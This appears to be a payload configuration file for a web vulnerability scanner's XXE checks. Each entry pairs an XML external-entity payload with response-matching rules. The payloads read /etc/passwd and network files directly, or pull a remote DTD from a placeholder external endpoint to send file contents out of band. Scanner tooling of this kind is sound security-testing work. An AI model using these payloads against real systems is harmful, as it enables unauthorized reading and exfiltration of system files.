[direct_linux_passwd]
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
rules = root:x:0:
    root:*:0:0

[direct_linux_networks]
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/networks">]><foo>&xxe;</foo>
rules = link-local

[direct_linux_networks_new]
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///usr/etc/networks">]><foo>&xxe;</foo>
rules = link-local

[direct_windows_networks]
payload = <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/windows/system32/drivers/etc/networks">]><foo>&xxe;</foo>
rules = network name/network number mappings

[out_of_band_linux_passwd]
payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
rules = root:x:0:
    root:*:0:0

[out_of_band_windows_networks]
payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/windows.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
rules = network name/network number mappings

[out_of_band_linux_networks]
payload = <?xml version="1.0"?>[LF]<!DOCTYPE foo [[LF]<!ENTITY % remote SYSTEM "[EXTERNAL_ENDPOINT]dtd/[SESSION_ID]/[PATH_ID]/[PARAM_AS_HEX]/linux2.dtd">[LF]%remote; %intern; %trick; ]>[LF]<xml><test>hello</test></xml>
rules = link-local